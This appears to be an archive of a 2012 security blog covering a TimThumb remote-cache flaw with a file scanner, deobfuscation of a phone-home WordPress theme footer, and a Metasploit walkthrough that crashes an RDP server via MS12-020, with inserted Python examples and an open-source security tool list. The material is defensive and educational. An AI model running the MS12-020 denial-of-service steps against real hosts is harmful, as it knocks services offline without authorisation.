29 March 2012

[Analysis] The JavaApplet injection at KBCHN.NET

In the series of events surrounding SINH TỬ LỆNH and the sites that were attacked, on 29/3/2012 the HVAonline member with the nickname miyumi2 posted an analysis of how the dissident (labelled "reactionary") website kbchn.net had a JavaApplet injected into it.

Figure: the injected code after analysis by Conmale

This has been a fairly common technique recently, in particular abusing Facebook applications.

28 March 2012

[Security] Analyzing Wordpress Themes


TimThumb is one of the files (PHP scripts) I most want to find during a penetration test, because versions 1.0 through 1.32 have a flaw that lets an attacker get a PHP script of their choosing fetched from a remote host and written into the script's cache directory [1,2], which leads to remote code execution. It is an image tool commonly bundled with WordPress themes that makes cropping, zooming and resizing a lot easier, and it is open source, of course.

The number of websites using this script is enormous, but most have hopefully upgraded to the current, completely rewritten 2.x branch, which fixes the critical remote-cache vulnerability along with other problems. At least 328 themes and 76 plug-ins [4] use the script, and the file is occasionally renamed, so an empty search result for "timthumb.php" does not mean it isn't there.
One way to search for the script is WPScan [5]; another is a bit of shell scripting, shown in a later figure. WPScan is a vulnerability scanner for WordPress-powered sites that uses black-box methods to identify problematic themes and plug-ins.
The shell-scripting route isn't rocket science, and is often enough: the example searches /var/www/ and all of its subdirectories and checks every file for the string "timthumb". With TimThumb it is usually only the file name that has been changed, not the contents. This matters when deciding whether to search for the filename or for a string inside the file; the latter is generally more successful.
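As an added example (not the shell script from the original write-up, whose figure is not reproduced here), the following Python does the same job as a recursive grep for "timthumb" under /var/www/, keyed on file contents rather than file names, and additionally pulls the VERSION define out of every hit so that a renamed 1.x copy stands out from a 2.x one. The directory layout, the file contents and the version threshold (flag anything below 1.33) are constructed assumptions for this example, not data from the article.

```python
import os
import re
import sys
import tempfile

# The write-up places the remote-cache flaw in TimThumb 1.0 .. 1.32, with the
# 2.x rewrite as the fix; treating "< 1.33" as vulnerable is this example's
# assumption, not a statement from the original article.
VULNERABLE_BELOW = (1, 33)

MARKER = re.compile(rb"timthumb", re.I)
# TimThumb declares its version as:  define ('VERSION', '2.8.10');
VERSION = re.compile(rb"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([0-9.]+)['\"]")


def parse_version(body):
    """Return the VERSION define as an int tuple, or None if absent."""
    m = VERSION.search(body)
    if not m:
        return None
    return tuple(int(p) for p in m.group(1).decode().split(".") if p.isdigit())


def scan(root, exts=(".php",)):
    """Walk `root` (think /var/www/) and report every PHP file whose *contents*
    mention TimThumb, with the version found and whether it is in the
    vulnerable range.  A hit with version None only references the script."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                body = fh.read()
            if not MARKER.search(body):
                continue
            version = parse_version(body)
            hits.append({
                "path": os.path.relpath(path, root),
                "version": version,
                "vulnerable": version is not None and version < VULNERABLE_BELOW,
            })
    return sorted(hits, key=lambda h: h["path"])


def build_sample_tree():
    """Constructed fixture standing in for /var/www/: a renamed old copy, a
    current copy, a helper that merely mentions the script, and a bystander."""
    root = tempfile.mkdtemp(prefix="wwwscan-")
    files = {
        "wp-content/themes/demo/thumb.php":
            b"<?php\n/* TimThumb script (constructed sample) */\n"
            b"define ('VERSION', '1.25');\n",
        "wp-content/plugins/gallery/timthumb.php":
            b"<?php\n/* TimThumb rewrite (constructed sample) */\n"
            b"define ('VERSION', '2.8.10');\n",
        "wp-content/themes/demo/functions.php":
            b"<?php // builds timthumb URLs but is not the script itself\n",
        "index.php": b"<?php echo 'hello'; ?>\n",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    # Pass a real document root as argv[1]; without one, scan the fixture.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for hit in scan(target):
        flag = "VULNERABLE" if hit["vulnerable"] else "ok"
        ver = ".".join(map(str, hit["version"])) if hit["version"] else "reference only"
        print("%-10s %-16s %s" % (flag, ver, hit["path"]))
```

Run it as `python scan.py /var/www` on the host; the point of matching on contents is that thumb.php in the fixture is reported as a 1.25 copy even though nothing in its name says TimThumb.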

Besides TimThumb, there's more
I have rarely, if ever, seen Cross-Site Scripting or SQL injection vulnerabilities inside theme files, but it is quite normal for them to occur in plug-ins. Recently, however, I discovered a rather interesting file inside a theme used on a few well-known websites. Their administrators were of course contacted about the potential risk this file poses.
The theme I'm referring to is the "Black Buttons Theme" [6,7], and the file is "footer.php". You might wonder what danger a file that, for example, displays the theme developer's credits can pose. Because footer.php was heavily obfuscated, there was most likely something to find, as there usually is with such files. Even though it is not a backdoor, in the worst case it can be used as one.
The developer implemented this as some sort of "copyright protection" and even stated that it is "prohibited" to reverse engineer the file, but that does not apply legally in countries like Denmark, where you may buy a product and take it apart as long as you are not endangering anyone, including yourself. Reverse engineering the file is a longer process, but in essence it is quite simple, and in some cases a necessary step to improve the security of your website if you use a theme that contains obfuscated code, which can contain virtually anything from good to bad.
If 1 out of 25 files contains obfuscated code, wouldn't you want to know what it contains? Imagine the developer's computer, website, repository, SVN and so on being compromised and the attackers updating the file with the obfuscated code. How would you tell the good code from the bad? In this case it is a possible security risk that should be assessed like everything else.
Looking at this code, it may seem like gibberish at first. But having seen this type of encoding countless times before, I know it is exactly what blackhats, script kiddies, hacktivists and the like do when they want to hide the contents of their files. Naturally, I get suspicious.
At a quick glance it is obvious to many that the file is Base64 encoded, and the easiest way to begin is to change eval() to print() or echo: this does not execute the encoded/obfuscated PHP code but instead prints it to the screen when the script is accessed via a web browser or the CLI [8].
Once this has been done, more obfuscation is often presented, in some cases almost worse than before:
Variable names like the ones above are another way to confuse humans. It doesn't really confuse me; it just makes me more eager to decode everything and find out why the person who developed the script chose to encode and obfuscate it so heavily.
As you can see, it doesn't get easier, but we don't have to translate all of these functions into human-readable code by hand, because in some cases we can make the machine do most of the work for us.
After some time we eventually end up with the original code that we want to study, and perhaps fix.
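The "make the machine do the work" step, as an added example that is not part of the original write-up and not the Black Buttons footer itself: the Python below does programmatically what swapping eval() for print() does by hand, peeling nested eval(base64_decode(...)) / eval(gzinflate(...)) / eval(str_rot13(...)) layers until plain code remains, and then lists the URLs the recovered code fetches, which is the question the write-up ends up asking about show_footer_links. The sample footer, its vendor URL (theme-vendor.example) and the two-layer wrapping are constructed here for the demonstration; the set of wrapper functions handled is an assumption about what such files commonly use.

```python
import base64
import re
import zlib

ROT13 = str.maketrans(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
    "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm")

# Python equivalents of the PHP wrappers usually stacked around eval().
DECODERS = {
    b"base64_decode": lambda d: base64.b64decode(re.sub(rb"\s+", b"", d)),
    b"gzinflate":     lambda d: zlib.decompress(d, -zlib.MAX_WBITS),  # raw DEFLATE
    b"gzuncompress":  lambda d: zlib.decompress(d),                   # zlib stream
    b"str_rot13":     lambda d: d.decode("latin-1").translate(ROT13).encode("latin-1"),
}

# eval( f1( f2( ... 'payload' ) ) );  -- wrapper names in group 1, literal in group 3
LAYER = re.compile(
    rb"eval\s*\(\s*((?:\w+\s*\(\s*)*)(['\"])([^'\"]*)\2\s*\)+\s*;?", re.S)


def peel_once(src):
    """Replace the outermost eval(...) in src with the code it would execute,
    i.e. what changing eval() to print() would show.  None if no eval is left."""
    m = LAYER.search(src)
    if m is None:
        return None
    data = m.group(3)
    for name in reversed(re.findall(rb"\w+", m.group(1))):  # innermost runs first
        if name not in DECODERS:
            raise ValueError("unsupported wrapper: %s" % name.decode())
        data = DECODERS[name](data)
    return src[:m.start()] + data + src[m.end():]


def deobfuscate(src, max_layers=20):
    """Peel nested layers until plain code remains; returns (code, layers_peeled)."""
    layers = 0
    while layers < max_layers:
        nxt = peel_once(src)
        if nxt is None:
            break
        src, layers = nxt, layers + 1
    return src, layers


# Once readable, the question is where the footer phones home to: pull URLs
# out of the usual PHP fetch primitives.
FETCH = re.compile(
    rb"(?:file_get_contents|fopen|fsockopen|curl_init|curl_setopt|wp_remote_get)"
    rb"\s*\([^;]*?(https?://[^\s'\"]+)", re.S)


def find_remote_fetches(src):
    return sorted({u.decode("latin-1") for u in FETCH.findall(src)})


# --- constructed sample: a footer like the one discussed, wrapped twice ------
INNER = (b"function show_footer_links() {\n"
         b"    // hypothetical vendor URL, invented for this example\n"
         b"    $html = file_get_contents(\"http://theme-vendor.example/footer.php?site=\""
         b" . $_SERVER[\"HTTP_HOST\"]);\n"
         b"    echo $html;\n"
         b"}\nshow_footer_links();\n")


def obfuscate(code):
    """Build the sample: eval(gzinflate(base64_decode(..))) inside eval(base64_decode(..))."""
    deflater = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    raw = deflater.compress(code) + deflater.flush()
    middle = b"eval(gzinflate(base64_decode('" + base64.b64encode(raw) + b"')));"
    return b"<?php eval(base64_decode(\"" + base64.b64encode(middle) + b"\")); ?>"


SAMPLE_FOOTER = obfuscate(INNER)

if __name__ == "__main__":
    code, layers = deobfuscate(SAMPLE_FOOTER)
    print("peeled %d layers" % layers)
    print(code.decode("latin-1"))
    print("remote fetches:", find_remote_fetches(code))
```

Feeding it a real footer.php is the same call with the file's bytes; an unknown wrapper raises rather than silently leaving a layer in place, and max_layers guards against a file whose decoded payload keeps re-encoding itself.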
What was so important to protect?
The file appears to be non-malicious, but it does contain some rather interesting code, as mentioned earlier: it doesn't just print the credits, the script does a lot more than that.
This function (show_footer_links) specifies which website to contact and which script/URI it should fetch information from. It may seem like a small issue, but there are plenty of bad scenarios available.
In the simplest scenario the developer's website gets compromised and the attacker updates the script that your site fetches to display the dynamic footer. At that point the attacker can do exactly what you can do on your site, and the possibilities are many.
The attacker may steal your cookies and hijack your session, place a JavaScript keylogger on the website, or redirect GET or POST requests for the login script to his own site, which would effectively steal all login credentials. He or she could also try to enumerate the type of router you have, in some cases steal your router password, and try to locate your real-world location.
In this very same scenario it isn't just your website that has been compromised via the developer's website; it's everyone who uses this theme, which could be thousands of websites with thousands of users.
Other dangerous scenarios
Man-in-the-middle attacks could also be performed against the remote website, with methods such as BGP hijacking, and if the DNS name server your website uses is vulnerable to DNS cache poisoning, an attacker could poison the domain your website resolves when it needs to display the footer, so that the IP address of the remote script returning the footer data would point at the attacker's server.
Another, simpler scenario is that the code itself was infected at some point during development or after release. After all, if the website that offers the theme is compromised, an attacker can also alter the code that way. Changing footer.php to point at the attacker's site instead of the developer's would raise little suspicion before the actual infection takes place.
Knowing this, it is hopefully clearer now that this script is a risk and should be considered dangerous.

25 March 2012

[Security] MS12-020 RDP Vulnerability overview and testing

By now, if you have been paying attention to your news reader, Google+ or Twitter feed, you will have noticed that Microsoft released a patch for a nasty denial-of-service (DoS) vulnerability. Here is a bit of information about it from the bulletin: "This security update resolves two privately reported vulnerabilities in the Remote Desktop Protocol. The more severe of these vulnerabilities could allow remote code execution if an attacker sends a sequence of specially crafted RDP packets to an affected system."

In short, the system crashes with a "blue screen of death" and reboots. The other vulnerability would allow an attacker to gain remote code execution on the affected system. Even though this patch was released over two weeks ago, most organisations are still vulnerable, not because they choose to be, but because most places have a "patch cycle" that requires extensive testing prior to deployment.
As explained by the fine people over at the ISC Diary, the Microsoft patch has several reference KBs: "KB2671387 (Remote Code Execution – CVE-2012-0002) and KB2667402 (Denial of Service – CVE-2012-0152) or KB2621440. The reference for the update you'll see on a Windows system, when installed, depends on the version of the OS you're running. For Windows 7 you'll likely note KB2667402, whereas you should only expect KB2621440 on a Windows XP host." As always, read the release notes before applying any patch.
We recently patched our internet-facing servers that had RDP enabled. Everything went well except for one server that we could not log back into via RDP; we regained access through the iLO port, applied a few additional patches and rebooted, which seemed to solve the issue.
Now for the fun part: if you would like to test the proof-of-concept for this vulnerability, grab a copy of Metasploit and follow the steps below.
My Test setup:

Linux (SolusOS)
VirtualBox VM running Windows Server 2008 (with RDP enabled)

Launch msfconsole and follow the steps outlined here:

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  3389             yes       The target port

msf auxiliary(ms12_020_maxchannelids) > set RHOST
msf auxiliary(ms12_020_maxchannelids) > run

[*] - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] - 210 bytes sent
[*] - Checking RDP status...
[+] seems down
[*] Auxiliary module execution completed

RHOST = the host running a vulnerable version of RDP
Screenshot of server 2008 reacting to the exploit

Now go out and patch your systems, and if you have some time, load Metasploit on a host of your choice and do some testing.

If you don't need RDP open to the outside world, disable it
Change the default port; everyone knows it's 3389
Enable Network Level Authentication (NLA)
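The last recommendation is worth verifying from the outside rather than trusting that a GPO applied. As an added example (not part of the original post), the Python below speaks just enough of the RDP connection sequence to find out: it offers the server PROTOCOL_RDP only, which a server that enforces NLA must refuse with HYBRID_REQUIRED_BY_SERVER, while a server that answers with RDP_NEG_RSP is still accepting non-CredSSP clients. The structures follow the X.224 Connection Request/Confirm and RDP_NEG_REQ/RSP/FAILURE layouts from MS-RDPBCGR; the reply builder exists only to construct sample server responses, and probe() needs a live host.

```python
import socket
import struct

# Negotiation values from the RDP connection sequence (MS-RDPBCGR 2.2.1.1 / 2.2.1.2).
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2   # HYBRID = CredSSP, i.e. NLA
TYPE_RDP_NEG_REQ, TYPE_RDP_NEG_RSP, TYPE_RDP_NEG_FAILURE = 0x01, 0x02, 0x03
FAILURE_CODES = {
    1: "SSL_REQUIRED_BY_SERVER", 2: "SSL_NOT_ALLOWED_BY_SERVER",
    3: "SSL_CERT_NOT_ON_SERVER", 4: "INCONSISTENT_FLAGS",
    5: "HYBRID_REQUIRED_BY_SERVER", 6: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}


def build_connection_request(requested_protocols):
    """Client side: TPKT + X.224 Connection Request carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_RDP_NEG_REQ, 0, 8, requested_protocols)
    x224 = struct.pack(">BBHHB", 6 + len(neg_req), 0xE0, 0, 0, 0) + neg_req
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def build_connection_confirm(neg_type=None, value=0):
    """Server side: X.224 Connection Confirm with RDP_NEG_RSP / RDP_NEG_FAILURE,
    or with no negotiation data at all (servers that predate negotiation).
    Used here only to construct sample responses for the classifier."""
    neg = b"" if neg_type is None else struct.pack("<BBHI", neg_type, 0, 8, value)
    x224 = struct.pack(">BBHHB", 6 + len(neg), 0xD0, 0, 0, 0) + neg
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def parse_connection_confirm(data):
    """Return ("rsp", selectedProtocol), ("failure", failureCode) or ("legacy", None)."""
    if len(data) < 11 or data[0] != 3 or struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("not a complete TPKT-framed PDU")
    li, code = data[4], data[5]
    if (code & 0xF0) != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    if li == 6:                      # no rdpNegData: the server never negotiates
        return "legacy", None
    neg_type, _flags, length, value = struct.unpack("<BBHI", data[11:19])
    if length != 8:
        raise ValueError("bad negotiation structure length")
    if neg_type == TYPE_RDP_NEG_RSP:
        return "rsp", value
    if neg_type == TYPE_RDP_NEG_FAILURE:
        return "failure", value
    raise ValueError("unknown negotiation type %d" % neg_type)


def nla_verdict(response):
    """Classify the reply to a request that offered PROTOCOL_RDP only.
    A server enforcing NLA must refuse such a client."""
    kind, value = parse_connection_confirm(response)
    if kind == "legacy":
        return "legacy"           # standard RDP security only; NLA not available
    if kind == "rsp":
        return "not-enforced"     # server accepted a non-CredSSP client
    if value == 5:
        return "enforced"         # HYBRID_REQUIRED_BY_SERVER
    if value == 1:
        return "tls-only"         # TLS required, but CredSSP not demanded
    return "failure:" + FAILURE_CODES.get(value, hex(value))


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-PDU")
        buf += chunk
    return buf


def probe(host, port=3389, timeout=5.0):
    """Live check (network required): send the legacy-only request, classify the answer."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connection_request(PROTOCOL_RDP))
        head = _recv_exact(sock, 4)
        body = _recv_exact(sock, struct.unpack(">H", head[2:4])[0] - 4)
    return nla_verdict(head + body)


if __name__ == "__main__":
    import sys
    print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 3389))
```

"enforced" is the answer you want from an internet-facing host; "not-enforced" or "legacy" means an unauthenticated peer still reaches the pre-authentication RDP code, which is exactly the exposure the patch above addresses.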



Via securegossip

24 March 2012

[Report] IBM X-Force 2011 - Trend and Risk report

[Security] Haters and Zombies Inc

Scammers put their philosophical shoes back on with fugit irreparabile timeline and mortem re-loaded baits

Hate it or not, the Timeline's here to stay. You know it, I know it, but does everybody else on Facebook know it? As we're living in a revolution-prone age, nobody actually expects an oppressive state of affairs to be accepted without even the slightest sign of opposition. Some may argue that what's unbearable to me might be nothing more than a minor discomfort to others. The nice thing is that in the online social world you can have as many "springs" as you want for as many causes as you want. After all, taking up arms in this environment simply means creating a page and then using it for a healthy crop of Likes to promote your cause.

Speaking of revolutions, here’s our very own “Timeline spring”, complete with a strong message “I hate Facebook Timeline” and one big fat planned action: “sending a report to Facebook staff, to remove facebook timeline!”


23 March 2012

[Ebook] Forensic Science

[RAT] The "Investigation based on viewers' letters" segment on ANTV

I happened to flip to the ANTV channel and caught the programme "Investigation based on viewers' letters", and noticed a few unreasonable points that could easily become "easy prey" for the press and for lawyers. This post is written as a set of questions... part idle talk, part genuine inquiry :))

- Does ANTV have an investigative function, or a coordinating function?
- Investigators, investigation officers, or reporters?
It is unclear what their role is, but since they wear security uniforms, presumably they are investigation officers :)
What are their function and authority? You can't just carry a camera around and "investigate".
Because, after all... going by a viewer's letter... is really only one side of the story.
- The professional competence of these "reporters" in handling situations is still IMMATURE and easily thrown off... they can easily fall into the public's "argumentative" traps, as well as practical ones :)

Just a bit of idle talk!

22 March 2012

[Tool] Open source apps for anti-virus, anti-spam, firewalls, encryption, security gateways and more



1. ASSP

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

The self-proclaimed "absolute best SPAM fighting weapon that the world has ever known," ASSP sits on your SMTP servers to stop spam and scan for viruses. Features include browser-based setup, support for most SMTP servers, automatic whitelists, early sender verification, Bayesian filters and more. Operating System: OS Independent.

2. MailScanner

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

Downloaded more than 1.3 million times by users in 225 countries, MailScanner is a free e-mail security package for mail servers. It incorporates SpamAssassin, ClamAV and a number of other tools to block spam and malware. Operating System: OS Independent.

3. SpamAssassin

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

"The powerful #1 open-source spam filter," SpamAssassin uses header and text analysis, Bayesian filtering, DNS blocklists, collaborative filtering databases and other techniques to block spam. The project is managed by the Apache Foundation, and it's been incorporated into a number of other open source and commercial products. Operating System: primarily Linux and OS X, although Windows versions are available.

4. SpamBayes

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

As you might guess from the name, this project offers a group of Bayesian filters for blocking spam. The site includes versions for Outlook, Outlook Express, Windows Live Mail, IncrediMail, Thunderbird, Gmail, Yahoo Mail and others. Operating System: OS Independent.

5. Nixory

Replaces: SpyBot Search and Destroy, AdAware

Nixory removes and blocks malicious tracking cookies (a.k.a. spyware) from your system. It supports Mozilla Firefox, Internet Explorer and Google Chrome, and it won't slow your system while you surf. Operating System: OS Independent.

6. ClamAV

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

This tremendously popular anti-virus engine has been incorporated into numerous security products and calls itself "the de facto standard for mail gateway scanning." The open source version runs on UNIX or Linux mail servers, but the website also offers a version called Immunet for individual Windows PCs. Operating System: Linux.

7. ClamTK

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

ClamTK makes ClamAV a little bit easier to use by providing a graphical interface for the anti-virus engine. Like the original, this one runs on Linux and scans on demand. Operating System: Linux.

8. ClamWin Free Antivirus

Replaces Kaspersky Anti-Virus, McAfee AntiVirus Plus, Norton Anti-Virus

Based on ClamAV, ClamWin protects more than 600,000 PCs from viruses and malware. Note that unlike most commercial anti-virus packages, ClamWin does not offer an on-access real-time scanner; in order to scan incoming files, you'll need to save them and then run a scan manually before opening or running the files. Operating System: Windows.

9. P3Scan

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

With P3Scan, you can set up a transparent proxy server that provides anti-virus and anti-spam protection. Operating System: Linux.


10. Amanda

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Protecting more than 500,000 systems worldwide, Amanda lays claim to the title "most popular open source backup and recovery software in the world." In addition to the community version, it's also available in a supported enterprise edition or as an appliance. Operating System: Windows, Linux, OS X.

11. Areca Backup

Replaces: NovaBackup

Aiming for a balance between simplicity and versatility, Areca offers an easy graphical interface with many options for creating and interacting with archived files. Key features include compression, encryption, delta backup support, archive merges and more. Operating System: Windows, Linux.

12. Bacula

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Designed for enterprise users, Bacula backs up multiple systems across a network. Commercial support and services for the popular product are available through Bacula Systems. Operating System: Windows, Linux, OS X.

13. Clonezilla

Replaces: Norton Ghost

Created as an alternative to Ghost, Clonezilla can clone single or multiple systems very quickly. It comes in two versions: Clonezilla Live for individual systems and Clonezilla SE for massive networks. Operating System: Windows, Linux, OS X.

14. Partimage

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Partimage can create a complete image of your system, which is useful if you need to recover from a full system crash or if you want to configure multiple systems with exactly the same software. It can also create a recovery partition on your drive. Operating System: Linux.

15. Redo

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Calling itself the "easiest, most complete disaster recovery solution available," Redo offers backup, restore and bare-metal recovery capabilities. Even in the most severe emergencies where you must completely replace a drive, Redo claims it can get you back up and running with all of your programs and files in just 10 minutes. Operating System: Linux.


16. Chromium

Replaces: Microsoft Internet Explorer

The open source version of Google Chrome, Chromium tends to be faster and more secure than competing browsers. Key security features include sandboxing, automatic updates, SafeBrowsing and more. Operating System: Windows, Linux, OS X.

17. Dooble

Replaces: Microsoft Internet Explorer

Dooble's developers have created this newer browser with an eye on safety and ease of use. Unlike most other browsers, it automatically encrypts all traffic for greater privacy and security. Operating System: Windows, Linux, OS X.

18. Tor

Replaces: Microsoft Internet Explorer

Tor protects your identity by providing anonymity while you browse the Web. It's used by journalists, activists, whistle-blowers and others concerned that someone might be snooping on their online activities. Operating System: Windows, Linux, OS X.

Browser Add-Ons

19. Web of Trust (WOT)

Replaces: McAfee SiteAdvisor Plus

Downloaded more than 33 million times, this popular add-on for Firefox, Internet Explorer, Chrome, Safari or Opera lets users know when they've strayed into websites that are questionable or insecure. It utilizes user ratings to identify sites that perpetuate scams, collect personal information or include unsuitable content, and it ranks them with a green-yellow-red classification system. Operating System: Windows, Linux, OS X.

20. PasswordMaker

Replaces Kaspersky Password Manager, Roboform

Using the same password all the time puts you at risk, but many people do it anyway because it's so difficult to remember a lot of different passwords. This browser add-on offers a better solution to the problem by creating unique passwords for each site you visit and storing them in an encrypted file that you access with a single master password. Operating System: Windows, Linux, OS X.

Data Removal

21. BleachBit

Replaces Easy System Cleaner

This helpful utility cleans up your system to protect your privacy and improve performance. It frees up disk space by cleaning junk from more than 90 applications, erasing temporary files, deleting cache and browsing history, and "shredding" unwanted files. Operating System: Windows, Linux.

22. Eraser

Replaces BCWipe Enterprise

Like BleachBit, Eraser "shreds" deleted files so that they cannot be recovered. It helps protect sensitive information by rewriting over deleted files several times with random data. Operating System: Windows.

23. Wipe

Replaces BCWipe Enterprise

Wipe offers the same functionality as Eraser, but it's for Linux instead of Windows. The site also offers a wealth of information for those interested in learning more about how file "shredding" works. Operating System: Linux.

24. Darik's Boot and Nuke

Replaces Kill Disk, BCWipe Total WipeOut

While Eraser and Wipe delete single files, DBAN securely deletes entire disks. It's very helpful when donating or disposing of an old system. Operating System: OS Independent.

Data Loss Prevention

25. OpenDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

OpenDLP is an "agent- and agentless-based, centrally-managed, massively distributable data loss prevention tool." It allows security or compliance managers to scan thousands of systems simultaneously via agents or perform agentless data discovery against a MySQL or Microsoft SQL server. Operating System: Windows.

26. MyDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

MyDLP can block credit card numbers, social security numbers, or sensitive files from being transmitted via e-mail, printers, the Web or removable devices. In addition to the free community version, it also comes in a paid enterprise version. Operating System: Windows, Linux, VMware.


27. AxCrypt

Replaces McAfee Anti-Theft, CryptoForge

With nearly 2.5 million registered users, AxCrypt claims to be the "leading open source file encryption software for Windows." It integrates with Windows Explorer—to use it, you simply right-click to encrypt a file or double-click to decrypt. Operating System: Windows.

28. GNU Privacy Guard

Replaces PGP Universal Gateway Email Encryption

This GNU project is a command-line implementation of the popular OpenPGP standard. It supports the ElGamal, DSA and RSA public-key algorithms; the AES, 3DES, Blowfish, Twofish and CAST5 ciphers; and the MD5, SHA-1, RIPEMD-160 and TIGER hash functions. Operating System: Linux.

29. GPGTools

Replaces PGP Universal Gateway Email Encryption

Mac users can download this version of GPG for a more user-friendly way to encrypt e-mail and files. The website includes quite a bit of help and tutorials for new users, which make it even easier to get started using the app. Operating System: OS X.

30. gpg4win

Replaces Cypherus

And this version offers GPG for Windows users, complete with a GUI. It installs quickly and easily, and it protects both files at rest and mail messages. Operating System: Windows.

31. PeaZip

Replaces WinZip

While it's really a compression utility not an encryption tool, PeaZip also offers strong encryption capabilities, which is why we included it in this section of the list. It also includes two-factor authentication capabilities and secure deletion. Operating System: Windows, Linux.

32. Crypt

Replaces McAfee Anti-Theft, CryptoForge

At just 44KB, Crypt is one of the lightest weight encryption utilities available. And because it can encrypt 3MB worth of data in just 0.7 seconds, it's also one of the fastest. However, it doesn't have a GUI, so you'll need to be comfortable with the command line in order to use it. Operating System: Windows.

33. NeoCrypt

Replaces McAfee Anti-Theft, CryptoForge

NeoCrypt supports multiple encryption algorithms, including AES, DES, Triple-DES, IDEA, RC4, RC5, CAST-128, BlowFish, SkipJack. It runs from an easy-to-use GUI, and it also integrates with the Windows Shell so that you can encrypt and decrypt files right from Windows Explorer. Operating System: Windows.

34. LUKS/cryptsetup

Replaces PGP Whole Disk Encryption

Short for "Linux Unified Key Setup," LUKS calls itself "the standard for Linux hard disk encryption." While many of the other apps on our list encrypt files one by one, LUKS encrypts your entire drive. Operating System: Linux.

35. FreeOTFE

Replaces PGP Whole Disk Encryption

Like LUKS, this app encrypts an entire drive. With it you can create and encrypt virtual disks on your hard drive. It's also highly portable and can run from a thumb drive. Operating System: Windows.

36. TrueCrypt

Replaces PGP Whole Disk Encryption

One of the most popular open source disk encryption options, TrueCrypt boasts more than 22 million downloads. Thanks to parallelization and pipelining, it offers fast reads and writes of encrypted information. Operating System: Windows, Linux, OS X.

Secure File Transfer

37. WinSCP

Replaces CuteFTP, FTP Commander

Extremely popular, the award-winning WinSCP includes an SFTP client, SCP client, FTPS client and FTP client. It offers two different interfaces and also includes an integrated text editor. Operating System: Windows.

38. FileZilla

Replaces CuteFTP, FTP Commander

While WinSCP offers only a client, FileZilla offers both a client and a version that lets you set up your own FTP server. It supports FTP, FTPS and SFTP. Operating System: Windows, Linux, OS X.


39. ODESSA

Replaces EnCase Forensics, X-Ways Forensics, AccessData Forensic Toolkit

The Open Digital Evidence Search and Seizure Architecture, aka "ODESSA," offers several different tools for examining and reporting on digital evidence. This is an older project, but still valuable. Operating System: Windows, Linux, OS X.

40. The Sleuth Kit/Autopsy Browser

Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

These two apps work together: The Sleuth Kit offers command line tools for conducting digital investigations, and Autopsy Browser offers a browser-based GUI for accessing those tools. The project also now includes a Hadoop framework for large-scale data analysis. Operating System: Windows, Linux, OS X.

Gateway/Unified Threat Management Appliances

41. Endian Firewall Community

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Endian Firewall Community can turn any PC (including pretty old ones) into a gateway security appliance complete with a firewall, application-level proxies with antivirus support, virus and spam-filtering for email, Web content and a VPN. Supported versions of the software and hardware appliances are also available on the site. Operating System: Linux.

42. Untangle Lite

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Similar to Endian, Untangle Lite also helps users create their own gateway security appliances. In addition, Untangle offers commercial products, and you can download each of the individual apps included in Untangle Lite (firewall, intrusion prevention, attack blocker, etc.) separately. Operating System: Linux.

43. ClearOS

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

ClearOS combines gateway security functionality with the capabilities of a small business server. It offers networking, groupware, a mail server, a Web server and more. Paid support and hardware are also available. Operating System: Linux.

Intrusion Detection

44. Open Source Tripwire

Replaces Tripwire

Standard Tripwire is now a closed source project, but the community has continued developing the open source version released in 2000. It monitors the content of files and alerts network managers when those files have changed, alerting them to possible intrusions. Operating System: Windows, Linux.


45. OSSEC

Replaces Corero IPS, HP TippingPoint IPS, Sophos HIPS

In addition to file integrity checking, OSSEC also performs log analysis, policy monitoring, rootkit detection and real-time alerting to help prevent and detect intrusions into your network. It's downloaded more than 5,000 times per month and has won numerous awards. Operating System: Windows, Linux.


46. AFICK

Replaces Tripwire

